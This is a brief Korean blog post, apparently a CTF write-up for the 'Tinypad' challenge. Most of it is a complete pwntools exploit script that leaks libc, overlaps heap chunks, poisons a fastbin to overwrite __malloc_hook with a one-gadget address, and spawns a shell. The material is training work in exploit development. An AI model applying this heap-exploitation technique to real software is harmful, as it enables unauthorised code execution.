github twitter facebook email
Tinypad
Feb 28, 2019
One minute read

House of Einherjar 연습해본다고 잡았는데, 안썼다ㅋㅋ…

그냥 오버랩 시켜서 패빈덮 해서 쓱 하면 덴다. einherjar는 다른문제로 해봐야지..

from pwn import *


def allocate(size, data):
    p.sendlineafter('>>> ', 'A')
    p.sendlineafter('>>> ', str(size))
    p.sendlineafter('>>> ', data)

def delete(idx):
    p.sendlineafter('>>> ', 'D')
    p.sendlineafter('>>> ', str(idx))

def edit(idx, data):
    p.sendlineafter('>>> ', 'E')
    p.sendlineafter('>>> ', str(idx))
    p.sendlineafter('>>> ', data)
    p.sendlineafter('>>> ', 'Y')

if __name__ == '__main__':
    p = process('./tinypad')
    elf = ELF('./tinypad')
    libc = elf.libc

    allocate(0x100, 'A'*8) # 1
    allocate(0x100, 'B'*8) # 2
    delete(1)
    delete(2)

    p.recvuntil('#   INDEX: 1')
    p.recvuntil('# CONTENT: ')
    leak = u64(p.recv(6).ljust(8, '\x00'))
    libcbase = leak - 0x3c4b78
    log.info('[LIBC] : 0x%x' % libcbase)

    ############################################################

    allocate(0x28, 'A'*0x28)  # 1
    allocate(0x18, 'B'*8)  # 2
    allocate(0x68, p64(0x21)*10)  # 3

    edit(1, 'A'*0x28 + '\x71')
    
    delete(3)
    delete(2)
    allocate(0x68, 'K'*0x18 + p64(0x71) + p64(libcbase + libc.symbols['__malloc_hook'] - 0x23))
    
    allocate(0x68, "A")
    allocate(0x68, "B"*19 + p64(libcbase + 0xf1147))    
    
    delete(1)

    p.interactive()

Back to posts


comments powered by Disqus